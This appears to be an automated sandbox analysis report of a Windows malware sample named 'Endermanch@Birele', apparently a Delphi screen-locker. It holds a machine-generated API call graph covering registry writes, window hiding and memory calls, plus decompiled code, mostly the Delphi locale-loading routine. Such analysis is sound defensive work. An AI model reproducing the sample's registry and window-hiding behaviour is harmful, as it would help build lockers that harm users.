13908 4049a6 lstrcpyn 13916 4049c4 13908->13916 13909->13893 13909->13894 13912->13909 13913 404a6e lstrcpyn 13913->13909 13914 4048e4 CharNextA 13914->13916 13915 4048e4 CharNextA 13915->13917 13916->13909 13916->13913 13916->13914 13918 4049e3 lstrcpyn FindFirstFileA 13916->13918 13917->13908 13917->13909 13918->13909 13919 404a0e FindClose lstrlen 13918->13919 13919->13909 13920 404a2d lstrcpyn lstrlen 13919->13920 13920->13916 13922 4048ec 13921->13922 13923 4048f7 13922->13923 13924 4048e6 CharNextA 13922->13924 13923->13909 13923->13915 13924->13922 13926 406ebc 28 API calls 13925->13926 13927 406fc4 13926->13927 13928 40766c 27 API calls 13927->13928 13929 406fe8 13928->13929 13930 406780 13929->13930 14087 4079a8 13930->14087 14097 407e84 13935->14097 13937 4062eb 13951 406274 13937->13951 13939 4062b1 13941 4062b7 13939->13941 13942 4062ed 13939->13942 13940 40631a 13946 40759c 3 API calls 13940->13946 14100 40759c 13941->14100 13944 4062f6 13942->13944 13945 406308 13942->13945 14105 4075cc 13944->14105 13948 40759c 3 API calls 13945->13948 13949 406335 13946->13949 13948->13937 13950 4075cc 3 API calls 13949->13950 13950->13937 13952 406285 13951->13952 13953 40627e 13951->13953 13955 406292 13952->13955 14120 407de0 13952->14120 14113 407e00 13953->14113 13957 407ee0 13955->13957 14133 407ed0 13957->14133 13960 407ef7 SetWindowPos 13960->13711 13961 407f09 13961->13711 13963 4083e0 2 API calls 13962->13963 13964 407a4d 13963->13964 13966 406a10 GetSysColor 13964->13966 13974 407a6d 13964->13974 13965 407aa3 13975 4061cc 13965->13975 13968 407a62 13966->13968 13967 407a83 DeleteObject 13969 407a8b 13967->13969 13971 40802c 3 API calls 13968->13971 13970 407a9d 13969->13970 14136 406ac8 13969->14136 13973 407838 InvalidateRect 13970->13973 13971->13974 13973->13965 13974->13965 13974->13967 13974->13969 14140 408750 13975->14140 13977 4061d9 13977->13715 13979 4067f8 25 API calls 13978->13979 13980 406460 13979->13980 13980->13718 14150 408218 13981->14150 13983 4082f8 13984 40766c 27 API calls 13983->13984 13985 40831b 13984->13985 13985->13726 13987 406ac8 DeleteObject 13986->13987 13988 405f29 13987->13988 13989 406a10 GetSysColor 13988->13989 13990 405f30 13989->13990 13990->13732 13993 406b05 13991->13993 13992 406b47 13992->13736 13993->13992 13994 406a6c DeleteObject 13993->13994 13994->13992 13996 4081ac 13995->13996 13997 4081bd 13996->13997 13998 406a6c DeleteObject 13996->13998 13997->13740 13998->13997 14000 408218 28 API calls 13999->14000 14001 4083b0 14000->14001 14001->13744 14003 4076ec 5 API calls 14002->14003 14004 407b7d 14003->14004 14005 407754 7 API calls 14004->14005 14006 407b9c 14005->14006 14006->13747 14008 4070bf 14007->14008 14009 408218 28 API calls 14008->14009 14010 4070e5 14009->14010 14010->13770 14012 4076a4 2 API calls 14011->14012 14013 4076e9 14012->14013 14014 40766c 14013->14014 14015 403a00 25 API calls 14014->14015 14016 407679 14015->14016 14017 40767e SendMessageA 14016->14017 14018 40768e 14016->14018 14017->14018 14019 40769b 14018->14019 14020 407838 InvalidateRect 14018->14020 14019->13776 14020->14019 14022 40759c 3 API calls 14021->14022 14023 407fa2 LoadCursorA 14022->14023 14024 4075fc 14023->14024 14025 40760b 14024->14025 14026 40762c GetCursorPos 14025->14026 14031 407664 14025->14031 14153 4077d0 14026->14153 14029 4077ec 3 API calls 14030 40764c 14029->14030 14030->14031 14032 40765e SetCursor 14030->14032 14033 4072f8 14031->14033 14032->14031 14034 4078e4 IsWindowEnabled 14033->14034 14035 407304 14034->14035 14036 407329 14035->14036 14037 407323 14035->14037 14038 40731c EnableWindow 14035->14038 14036->13796 14039 407838 InvalidateRect 14037->14039 14038->14037 14039->14036 14041 408218 28 API calls 14040->14041 14042 408338 14041->14042 14043 40766c 27 API calls 14042->14043 14044 408385 14043->14044 14044->13799 14046 408218 28 API calls 14045->14046 14047 407009 14046->14047 14048 40766c 27 API calls 14047->14048 14049 407032 14048->14049 14049->13809 14051 408750 25 API calls 14050->14051 14052 40643d 14051->14052 14052->13848 14054 408750 25 API calls 14053->14054 14055 40640d 14054->14055 14055->13853 14057 407e27 14056->14057 14058 407e2d GetSystemMetrics GetSystemMetrics 14056->14058 14057->14058 14059 407e43 14057->14059 14060 407e4e 14058->14060 14061 4077ec 3 API calls 14059->14061 14062 4083e0 2 API calls 14060->14062 14061->14060 14063 407e55 14062->14063 14064 4079f0 5 API calls 14063->14064 14065 407e5c 14064->14065 14066 4079a8 7 API calls 14065->14066 14067 407e6c 14066->14067 14068 407a18 5 API calls 14067->14068 14069 407e73 14068->14069 14070 4079cc 7 API calls 14069->14070 14071 407e80 14070->14071 14071->13861 14156 416be8 14072->14156 14078 416e8f SystemParametersInfoA FindWindowA ShowWindow 14198 402800 QueryPerformanceCounter 14078->14198 14080 416eb5 14201 4086d8 14080->14201 14083 40766c 27 API calls 14084 416ed7 14083->14084 14085 4039ac 11 API calls 14084->14085 14086 41639e 14085->14086 14086->13866 14088 407744 5 API calls 14087->14088 14089 4079af 14088->14089 14090 407754 7 API calls 14089->14090 14091 40678d 14090->14091 14092 4079cc 14091->14092 14093 407744 5 API calls 14092->14093 14094 4079d4 14093->14094 14095 407754 7 API calls 14094->14095 14096 406796 14095->14096 14096->13704 14110 407f18 14097->14110 14101 4075a1 14100->14101 14102 4075c8 14100->14102 14101->14102 14103 4075a9 SetWindowLongA SetWindowPos 14101->14103 14102->13937 14104 407838 InvalidateRect 14103->14104 14104->14102 14106 4075d1 14105->14106 14107 4075f8 14105->14107 14106->14107 14108 4075d9 SetWindowLongA SetWindowPos 14106->14108 14107->13937 14109 407838 InvalidateRect 14108->14109 14109->14107 14111 4062a5 14110->14111 14112 407f1d GetWindowLongA GetWindowLongA GetClassLongA 14110->14112 14111->13937 14111->13939 14111->13940 14112->14111 14127 407dcc 14113->14127 14116 4079f0 5 API calls 14117 407e11 14116->14117 14118 4079fc 7 API calls 14117->14118 14119 407e1d 14118->14119 14119->13952 14130 407db8 14120->14130 14123 407a18 5 API calls 14124 407df1 14123->14124 14125 407a24 7 API calls 14124->14125 14126 407dfd 14125->14126 14126->13955 14128 4077ec 3 API calls 14127->14128 14129 407dd6 14128->14129 14129->14116 14131 4077ec 3 API calls 14130->14131 14132 407dc2 14131->14132 14132->14123 14134 407f18 3 API calls 14133->14134 14135 407ed5 14134->14135 14135->13960 14135->13961 14137 406ad0 14136->14137 14138 406ad7 14136->14138 14139 406a6c DeleteObject 14137->14139 14138->13970 14139->14138 14141 408786 14140->14141 14142 40875c 14140->14142 14141->13977 14143 402638 25 API calls 14142->14143 14144 408766 14143->14144 14146 406854 14144->14146 14147 406860 14146->14147 14149 406865 14146->14149 14148 405d04 25 API calls 14147->14148 14148->14149 14149->14141 14151 406ebc 28 API calls 14150->14151 14152 40822a 14151->14152 14152->13983 14154 407640 14153->14154 14155 4077de ScreenToClient 14153->14155 14154->14029 14155->14154 14215 4150ec 14156->14215 14158 416c0f 14219 41518c 14158->14219 14164 416c35 14249 41566c 14164->14249 14168 416c5d 14260 4039d0 14168->14260 14171 416cd4 14172 4150ec 14 API calls 14171->14172 14173 416cfb 14172->14173 14174 41518c 14 API calls 14173->14174 14175 416d09 14174->14175 14176 4152d0 29 API calls 14175->14176 14177 416d17 14176->14177 14178 406040 27 API calls 14177->14178 14179 416d21 14178->14179 14180 41566c 57 API calls 14179->14180 14181 416d42 14180->14181 14182 41515c 13 API calls 14181->14182 14183 416d49 14182->14183 14184 4039d0 11 API calls 14183->14184 14185 416d6a 14184->14185 14186 416af0 14185->14186 14187 4150ec 14 API calls 14186->14187 14188 416b05 14187->14188 14189 41518c 14 API calls 14188->14189 14190 416b23 14189->14190 14191 4152d0 29 API calls 14190->14191 14192 416b32 14191->14192 14193 416b54 14192->14193 14194 416b36 14192->14194 14196 415d0c 72 API calls 14193->14196 14359 415d0c 14194->14359 14197 416b4a 14196->14197 14197->14078 14199 402818 GetTickCount 14198->14199 14200 40280d 14198->14200 14199->14080 14200->14080 14202 4086db 14201->14202 14495 407f54 14202->14495 14207 40802c 3 API calls 14209 408707 14207->14209 14208 40872e 14210 408746 14208->14210 14212 402658 11 API calls 14208->14212 14209->14208 14211 402638 25 API calls 14209->14211 14210->14083 14213 408714 14211->14213 14212->14210 14213->14208 14214 40802c 3 API calls 14213->14214 14214->14208 14216 4150f2 14215->14216 14217 41518c 14 API calls 14216->14217 14218 41510a 14217->14218 14218->14158 14220 4151b3 14219->14220 14221 415199 14219->14221 14225 4152d0 14220->14225 14222 4151a9 14221->14222 14223 41519f RegCloseKey 14221->14223 14224 41515c 13 API calls 14222->14224 14223->14222 14224->14220 14226 403a44 11 API calls 14225->14226 14227 4152fc 14226->14227 14228 41531c 14227->14228 14264 403ed8 14227->14264 14230 41532d 14228->14230 14232 415357 14228->14232 14231 415349 RegOpenKeyExA 14230->14231 14233 415389 14231->14233 14234 41537d RegCreateKeyExA 14232->14234 14235 4153bf 14233->14235 14236 4153b2 14233->14236 14269 403d08 14233->14269 14234->14233 14239 4039ac 11 API calls 14235->14239 14278 4151b8 14236->14278 14240 4153d4 14239->14240 14241 406040 14240->14241 14242 406047 GetModuleFileNameA 14241->14242 14243 40606e GetCommandLineA 14241->14243 14289 403a9c 14242->14289 14246 406076 14243->14246 14247 403a9c 25 API calls 14246->14247 14248 4060a3 14247->14248 14248->14164 14250 41567c 14249->14250 14294 415698 14250->14294 14252 415692 14253 41515c 14252->14253 14254 415187 14253->14254 14255 415166 14253->14255 14254->14168 14256 415174 RegFlushKey 14255->14256 14257 41516c RegCloseKey 14255->14257 14258 41517a 14256->14258 14257->14258 14259 4039ac 11 API calls 14258->14259 14259->14254 14261 4039d6 14260->14261 14262 4039fc 14261->14262 14263 402658 11 API calls 14261->14263 14262->14171 14263->14261 14283 403e88 14264->14283 14266 403f1c 14266->14228 14267 403ee6 14267->14266 14268 403f68 25 API calls 14267->14268 14268->14266 14270 403d19 14269->14270 14271 403d56 14270->14271 14272 403d3f 14270->14272 14274 403a70 25 API calls 14271->14274 14273 403f68 25 API calls 14272->14273 14275 403d4c 14273->14275 14274->14275 14276 403d87 14275->14276 14277 403a00 25 API calls 14275->14277 14277->14276 14279 41515c 13 API calls 14278->14279 14280 4151c8 14279->14280 14281 403a00 25 API calls 14280->14281 14282 4151d5 14281->14282 14282->14235 14284 403e44 14283->14284 14285 403e7f 14284->14285 14286 403a70 25 API calls 14284->14286 14285->14267 14287 403e5b 14286->14287 14287->14285 14288 402658 11 API calls 14287->14288 14288->14285 14290 403a70 25 API calls 14289->14290 14291 403aac 14290->14291 14292 4039ac 11 API calls 14291->14292 14293 403ac4 14292->14293 14293->14164 14295 4156b0 14294->14295 14296 4156c4 RegSetValueExA 14295->14296 14297 4156d2 14296->14297 14298 4156f1 14296->14298 14300 40cdd0 14297->14300 14298->14252 14301 40cdde 14300->14301 14310 405314 14301->14310 14303 40ce08 14316 40a458 14303->14316 14306 403a00 25 API calls 14307 40ce21 14306->14307 14308 4039d0 11 API calls 14307->14308 14309 40ce3b 14308->14309 14309->14298 14311 405355 14310->14311 14312 405324 14310->14312 14311->14303 14312->14311 14319 4048bc 14312->14319 14314 405344 LoadStringA 14315 403a9c 25 API calls 14314->14315 14315->14311 14324 40a46c 14316->14324 14320 4048e3 14319->14320 14322 4048c6 14319->14322 14320->14314 14321 404874 30 API calls 14323 4048dc 14321->14323 14322->14320 14322->14321 14323->14314 14325 40a490 14324->14325 14327 40a4bb 14325->14327 14337 40a0a0 14325->14337 14328 40a4d0 14327->14328 14329 40a513 14327->14329 14331 40a509 14328->14331 14333 4039ac 11 API calls 14328->14333 14335 403f68 25 API calls 14328->14335 14336 40a0a0 56 API calls 14328->14336 14330 403a9c 25 API calls 14329->14330 14334 40a467 14330->14334 14332 403f68 25 API calls 14331->14332 14332->14334 14333->14328 14334->14306 14335->14328 14336->14328 14342 40a0c9 14337->14342 14338 40a0da 14356 40a3f7 14338->14356 14341 40a182 11 API calls 14341->14342 14342->14338 14342->14341 14345 40a1ca 14342->14345 14353 40a094 14342->14353 14346 40a1db 14345->14346 14348 40a235 14345->14348 14346->14348 14349 40a2d3 14346->14349 14347 40a3f7 11 API calls 14347->14348 14348->14347 14350 40a018 56 API calls 14348->14350 14352 409908 14348->14352 14351 40a070 11 API calls 14349->14351 14349->14352 14350->14348 14351->14352 14352->14342 14354 4039ac 11 API calls 14353->14354 14355 40a09e 14354->14355 14355->14342 14357 4039ac 11 API calls 14356->14357 14358 40a404 14357->14358 14358->14327 14381 41580c 14359->14381 14362 415df5 14362->14197 14363 41580c 27 API calls 14364 415d37 14363->14364 14364->14362 14386 415774 14364->14386 14369 415774 26 API calls 14370 415d78 14369->14370 14371 415d81 14370->14371 14372 415dd7 RegCloseKey 14370->14372 14407 415998 14371->14407 14372->14197 14375 415d9b 14418 415ac0 14375->14418 14377 415db9 RegCloseKey 14377->14197 14378 415da8 14378->14377 14437 4153f4 14378->14437 14382 415774 26 API calls 14381->14382 14383 41583f 14382->14383 14384 415845 RegCloseKey 14383->14384 14385 41584b 14383->14385 14384->14385 14385->14362 14385->14363 14387 403a44 11 API calls 14386->14387 14388 41579d 14387->14388 14389 403ed8 25 API calls 14388->14389 14390 4157bd 14388->14390 14389->14390 14391 4157de RegOpenKeyExA 14390->14391 14392 4157f1 14391->14392 14393 4039ac 11 API calls 14392->14393 14394 4157f9 14393->14394 14394->14362 14395 4151f4 14394->14395 14396 403a44 11 API calls 14395->14396 14397 415223 14396->14397 14398 403ed8 25 API calls 14397->14398 14399 415243 14397->14399 14398->14399 14400 41526a RegCreateKeyExA 14399->14400 14401 415286 14400->14401 14402 41527b RegCloseKey 14400->14402 14404 40cdd0 56 API calls 14401->14404 14403 4152a5 14402->14403 14405 4039ac 11 API calls 14403->14405 14404->14403 14406 4152bf 14405->14406 14406->14369 14408 4159d5 14407->14408 14460 41558c 14408->14460 14411 415a6e 14411->14375 14413 415a05 14414 403a9c 25 API calls 14413->14414 14416 415a14 14414->14416 14415 415a3a RegEnumValueA 14415->14416 14416->14411 14416->14415 14417 415878 59 API calls 14416->14417 14417->14416 14419 415b02 14418->14419 14420 41558c RegQueryInfoKeyA 14419->14420 14421 415b1e 14420->14421 14422 403a9c 25 API calls 14421->14422 14423 415cbb 14421->14423 14425 415b34 14422->14425 14423->14378 14424 415b66 RegEnumKeyExA 14424->14425 14425->14423 14425->14424 14426 415774 26 API calls 14425->14426 14427 415ba9 14425->14427 14426->14425 14428 4151f4 58 API calls 14427->14428 14429 415bff 14428->14429 14430 415774 26 API calls 14429->14430 14431 415c1f 14430->14431 14432 415998 61 API calls 14431->14432 14433 415c3f 14432->14433 14434 415ac0 64 API calls 14433->14434 14435 415c4f RegCloseKey 14434->14435 14435->14378 14438 403a44 11 API calls 14437->14438 14439 415423 14437->14439 14438->14439 14440 415446 14439->14440 14441 403ed8 25 API calls 14439->14441 14442 415774 26 API calls 14440->14442 14441->14440 14443 415459 14442->14443 14444 415466 14443->14444 14445 41551b 14443->14445 14446 41558c RegQueryInfoKeyA 14444->14446 14448 41552f RegDeleteKeyA 14445->14448 14447 41548a 14446->14447 14449 4154f2 14447->14449 14451 403a9c 25 API calls 14447->14451 14450 415547 14448->14450 14454 41550a RegCloseKey 14449->14454 14452 4039ac 11 API calls 14450->14452 14458 41549c 14451->14458 14453 41554f 14452->14453 14455 4039d0 11 API calls 14453->14455 14454->14377 14456 41555c 14455->14456 14456->14377 14457 4154c0 RegEnumKeyExA 14457->14458 14458->14449 14458->14457 14459 4153f4 27 API calls 14458->14459 14459->14458 14475 4028f0 14460->14475 14463 4155d9 14463->14411 14464 415878 14463->14464 14465 41589d 14464->14465 14477 415644 14465->14477 14469 41596e 14469->14413 14470 4158c9 14483 415700 14470->14483 14472 4158ef 14473 415698 57 API calls 14472->14473 14474 41592e 14473->14474 14474->14413 14476 402904 RegQueryInfoKeyA 14475->14476 14476->14463 14489 4155f4 14477->14489 14479 415658 14479->14469 14480 409720 14479->14480 14481 402638 25 API calls 14480->14481 14482 40972b 14481->14482 14482->14470 14493 403e38 14483->14493 14486 415734 14488 40cdd0 56 API calls 14486->14488 14487 415753 14487->14472 14488->14487 14490 41560d 14489->14490 14491 415621 RegQueryValueExA 14490->14491 14492 415638 14491->14492 14492->14479 14494 403e3c RegQueryValueExA 14493->14494 14494->14486 14494->14487 14496 407f44 14495->14496 14497 407f50 14496->14497 14498 40802c 3 API calls 14496->14498 14499 407f64 14497->14499 14498->14497 14500 407f44 14499->14500 14501 407f50 14500->14501 14502 40802c 3 API calls 14500->14502 14501->14207 14501->14208 14502->14501 14513 407ac4 PeekMessageA 14503->14513 14506 407b23 14506->13868 14508 406927 14507->14508 14511 406947 14507->14511 14509 407b18 3 API calls 14508->14509 14508->14511 14510 40693b 14509->14510 14512 40802c 3 API calls 14510->14512 14511->13867 14512->14511 14514 407ae4 14513->14514 14515 407adc 14513->14515 14514->14503 14514->14506 14515->14514 14516 407afb TranslateMessage DispatchMessageA 14515->14516 14516->14514 14517 406a8e 14518 406aa4 14517->14518 14519 406a97 14517->14519 14521 406aa9 DeleteObject 14518->14521 14522 406aaf 14518->14522 14519->14518 14520 406a9c DeleteObject 14519->14520 14520->14518 14521->14522 14523 406818 11 API calls 14522->14523 14524 406ab5 14523->14524 14525 562ad9 14526 562ade 14525->14526 14528 560fcd 14526->14528 14529 560fdd 14528->14529 14530 56112e NtFreeVirtualMemory 14529->14530 14531 561f73 14530->14531 14531->14526

                                                                                                          Control-flow Graph

                                                                                                          C-Code - Quality: 65%
                                                                                                          			E00404AB0(intOrPtr __eax) {
                                                                                                          				intOrPtr _v8;
                                                                                                          				void* _v12;
                                                                                                          				char _v15;
                                                                                                          				char _v17;
                                                                                                          				char _v18;
                                                                                                          				char _v22;
                                                                                                          				int _v28;
                                                                                                          				char _v289;
                                                                                                          				long _t44;
                                                                                                          				long _t61;
                                                                                                          				long _t63;
                                                                                                          				CHAR* _t70;
                                                                                                          				CHAR* _t72;
                                                                                                          				struct HINSTANCE__* _t78;
                                                                                                          				struct HINSTANCE__* _t84;
                                                                                                          				char* _t94;
                                                                                                          				void* _t95;
                                                                                                          				intOrPtr _t99;
                                                                                                          				struct HINSTANCE__* _t107;
                                                                                                          				void* _t110;
                                                                                                          				void* _t112;
                                                                                                          				intOrPtr _t113;
                                                                                                          
                                                                                                          				_t110 = _t112;
                                                                                                          				_t113 = _t112 + 0xfffffee0;
                                                                                                          				_v8 = __eax;
                                                                                                          				GetModuleFileNameA(0,  &_v289, 0x105);
                                                                                                          				_v22 = 0;
                                                                                                          				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                                                          				if(_t44 == 0) {
                                                                                                          					L3:
                                                                                                          					_push(_t110);
                                                                                                          					_push(0x404bb5);
                                                                                                          					_push( *[fs:eax]);
                                                                                                          					 *[fs:eax] = _t113;
                                                                                                          					_v28 = 5;
                                                                                                          					E004048F8( &_v289, 0x105);
                                                                                                          					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, 0x404d1c, 0, 0,  &_v22,  &_v28) != 0) {
                                                                                                          						_v22 = 0;
                                                                                                          					}
                                                                                                          					_v18 = 0;
                                                                                                          					_pop(_t99);
                                                                                                          					 *[fs:eax] = _t99;
                                                                                                          					_push(0x404bbc);
                                                                                                          					return RegCloseKey(_v12);
                                                                                                          				} else {
                                                                                                          					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                                                          					if(_t61 == 0) {
                                                                                                          						goto L3;
                                                                                                          					} else {
                                                                                                          						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                                                          						if(_t63 != 0) {
                                                                                                          							_push(0x105);
                                                                                                          							_push(_v8);
                                                                                                          							_push( &_v289);
                                                                                                          							L00401200();
                                                                                                          							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
                                                                                                          							_t107 = 0;
                                                                                                          							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                                                                                                          								_t70 =  &_v289;
                                                                                                          								_push(_t70);
                                                                                                          								L00401208();
                                                                                                          								_t94 = _t70 +  &_v289;
                                                                                                          								while( *_t94 != 0x2e && _t94 !=  &_v289) {
                                                                                                          									_t94 = _t94 - 1;
                                                                                                          								}
                                                                                                          								_t72 =  &_v289;
                                                                                                          								if(_t94 != _t72) {
                                                                                                          									_t95 = _t94 + 1;
                                                                                                          									if(_v22 != 0) {
                                                                                                          										_push(0x105 - _t95 - _t72);
                                                                                                          										_push( &_v22);
                                                                                                          										_push(_t95);
                                                                                                          										L00401200();
                                                                                                          										_t107 = LoadLibraryExA( &_v289, 0, 2);
                                                                                                          									}
                                                                                                          									if(_t107 == 0 && _v17 != 0) {
                                                                                                          										_push(0x105 - _t95 -  &_v289);
                                                                                                          										_push( &_v17);
                                                                                                          										_push(_t95);
                                                                                                          										L00401200();
                                                                                                          										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
                                                                                                          										_t107 = _t78;
                                                                                                          										if(_t107 == 0) {
                                                                                                          											_v15 = 0;
                                                                                                          											_push(0x105 - _t95 -  &_v289);
                                                                                                          											_push( &_v17);
                                                                                                          											_push(_t95);
                                                                                                          											L00401200();
                                                                                                          											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
                                                                                                          											_t107 = _t84;
                                                                                                          										}
                                                                                                          									}
                                                                                                          								}
                                                                                                          							}
                                                                                                          							return _t107;
                                                                                                          						} else {
                                                                                                          							goto L3;
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          			}

























                                                                                                          0x00404ab1
                                                                                                          0x00404ab3
                                                                                                          0x00404abb
                                                                                                          0x00404acc
                                                                                                          0x00404ad1
                                                                                                          0x00404aea
                                                                                                          0x00404af1
                                                                                                          0x00404b33
                                                                                                          0x00404b35
                                                                                                          0x00404b36
                                                                                                          0x00404b3b
                                                                                                          0x00404b3e
                                                                                                          0x00404b41
                                                                                                          0x00404b53
                                                                                                          0x00404b76
                                                                                                          0x00404b96
                                                                                                          0x00404b96
                                                                                                          0x00404b9a
                                                                                                          0x00404ba0
                                                                                                          0x00404ba3
                                                                                                          0x00404ba6
                                                                                                          0x00404bb4
                                                                                                          0x00404af3
                                                                                                          0x00404b08
                                                                                                          0x00404b0f
                                                                                                          0x00000000
                                                                                                          0x00404b11
                                                                                                          0x00404b26
                                                                                                          0x00404b2d
                                                                                                          0x00404bbc
                                                                                                          0x00404bc4
                                                                                                          0x00404bcb
                                                                                                          0x00404bcc
                                                                                                          0x00404bdf
                                                                                                          0x00404be4
                                                                                                          0x00404bed
                                                                                                          0x00404c03
                                                                                                          0x00404c09
                                                                                                          0x00404c0a
                                                                                                          0x00404c17
                                                                                                          0x00404c1c
                                                                                                          0x00404c1b
                                                                                                          0x00404c1b
                                                                                                          0x00404c2b
                                                                                                          0x00404c33
                                                                                                          0x00404c39
                                                                                                          0x00404c3e
                                                                                                          0x00404c4b
                                                                                                          0x00404c4f
                                                                                                          0x00404c50
                                                                                                          0x00404c51
                                                                                                          0x00404c66
                                                                                                          0x00404c66
                                                                                                          0x00404c6a
                                                                                                          0x00404c83
                                                                                                          0x00404c87
                                                                                                          0x00404c88
                                                                                                          0x00404c89
                                                                                                          0x00404c99
                                                                                                          0x00404c9e
                                                                                                          0x00404ca2
                                                                                                          0x00404ca4
                                                                                                          0x00404cb9
                                                                                                          0x00404cbd
                                                                                                          0x00404cbe
                                                                                                          0x00404cbf
                                                                                                          0x00404ccf
                                                                                                          0x00404cd4
                                                                                                          0x00404cd4
                                                                                                          0x00404ca2
                                                                                                          0x00404c6a
                                                                                                          0x00404c33
                                                                                                          0x00404cdd
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00404b2d
                                                                                                          0x00404b0f

                                                                                                          APIs
                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 00404ACC
                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404AEA
                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404B08
                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00404B26
                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00404BB5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404B6F
                                                                                                          • RegQueryValueExA.ADVAPI32(?,00404D1C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00404BB5,?,80000001), ref: 00404B8D
                                                                                                          • RegCloseKey.ADVAPI32(?,00404BBC,00000000,00000000,00000005,00000000,00404BB5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404BAF
                                                                                                          • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00404BCC
                                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00404BD9
                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00404BDF
                                                                                                          • lstrlen.KERNEL32(00000000), ref: 00404C0A
                                                                                                          • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 00404C51
                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00404C61
                                                                                                          • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 00404C89
                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00404C99
                                                                                                          • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00404CBF
                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00404CCF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                          • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                          • API String ID: 1759228003-3917250287
                                                                                                          • Opcode ID: f6af56f1720421a918e5e21f07f9e7cb961e80019e6e28d89f09e10ff1b83a93
                                                                                                          • Instruction ID: 36f382792d8f6a15946af365c1c16693b3cf50086e74e5892625d65cdf9cf2f1
                                                                                                          • Opcode Fuzzy Hash: f6af56f1720421a918e5e21f07f9e7cb961e80019e6e28d89f09e10ff1b83a93
                                                                                                          • Instruction Fuzzy Hash: C75188B1A4024C7AFB21D6A58C46FEF76BC9B44744F4101B7BB00F61C2E6789E448B68
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00415E7C(intOrPtr* __eax, void* __ecx, void* __edx, void* __eflags) {
                                                                                                          				void* __ebx;
                                                                                                          				void* __edi;
                                                                                                          				void* __esi;
                                                                                                          				intOrPtr* _t74;
                                                                                                          				void* _t119;
                                                                                                          				void* _t149;
                                                                                                          				void* _t283;
                                                                                                          				intOrPtr* _t284;
                                                                                                          				intOrPtr _t306;
                                                                                                          				intOrPtr _t316;
                                                                                                          				intOrPtr _t319;
                                                                                                          				intOrPtr _t324;
                                                                                                          				intOrPtr _t337;
                                                                                                          				intOrPtr _t340;
                                                                                                          				intOrPtr _t344;
                                                                                                          				intOrPtr _t363;
                                                                                                          				intOrPtr _t367;
                                                                                                          				intOrPtr _t371;
                                                                                                          				intOrPtr _t388;
                                                                                                          
                                                                                                          				_t399 = __eflags;
                                                                                                          				_t387 = __edx;
                                                                                                          				_t284 = __eax;
                                                                                                          				_t306 =  *0x415e68; // 0x415e74
                                                                                                          				 *_t284 = E004067F8(_t306, __eflags);
                                                                                                          				_t388 = E00406780(E00406FB4(__eflags), 0x14, 0x9d);
                                                                                                          				 *((intOrPtr*)( *_t284 + 0x18)) = _t388;
                                                                                                          				_t74 =  *0x4185a4; // 0x4198a8
                                                                                                          				 *_t74 = _t388;
                                                                                                          				_t2 =  *_t284 + 0x18; // 0x20a1158
                                                                                                          				E00406828( *_t2,  *_t284);
